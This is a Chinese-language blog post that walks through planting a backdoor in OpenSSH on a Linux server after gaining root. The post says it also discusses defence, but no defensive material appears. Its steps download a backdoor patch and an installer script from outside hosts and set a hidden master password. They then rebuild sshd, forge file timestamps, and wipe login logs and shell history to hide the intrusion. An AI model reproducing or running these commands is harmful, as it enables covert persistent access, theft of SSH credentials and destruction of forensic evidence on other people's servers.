Linux安装openssh的后门补丁

相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一,OpenSSh后门比较难于检测,本文就如何添加OpenSSH后门以及防范后门添加进行探讨。

1,补丁下载:

#wget http://www.mrliangqi.com/pack/openssh-5.9p1.zip

2,解压后文件修改记录日志及密码

# cd openssh-5.9p1

# openssl rand 6 -base64 随机生成密码

h7SWmK1V

# vim includes.h

#define ILOG "/tmp/ilog" 修改为空

#define OLOG "/tmp/olog" 修改为空

#define SECRETPW "system" 修改需要登录的密码h7SWmK1V

3,安装相关依赖

#yum install openssl openssl-devel pam-devel -y

4,备份原有配置文件

#cp -p /etc/ssh/sshd_config{,.bak}

5,编译安装

#./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5 && make && make install

6,恢复之前文件的创建时间

# cd /etc/ssh/

#touch -r sshd_config.bak ssh_config

7,重载登录

#service sshd reload

8,删除记录

删除ssh补丁包

# rm -rf openssh-5.9p1*

删除部分记录

#echo ""> /var/log/wtmp

#echo ""> /var/log/btmp

#echo ""> ./.bash_history

删除或者隐藏原本sshd配置文件

#mv sshd_config.bak .sshd_config.bak

脚本安装:

#wget https://raw.githubusercontent.com/yeohZhou/neiwang/master/sshBackdoorinsatll.sh --no-check
#mv sshBackdoorinsatll.sh /var/tmp/
#cd /var/tmp
#chmod +x sshBackdoorinsatll.sh
#ssh -V
#./sshBackdoorinsatll.sh OpenSSH_4.3 p2
#/etc/init.d/sshd restart

 


发表评论

登录 后发表评论.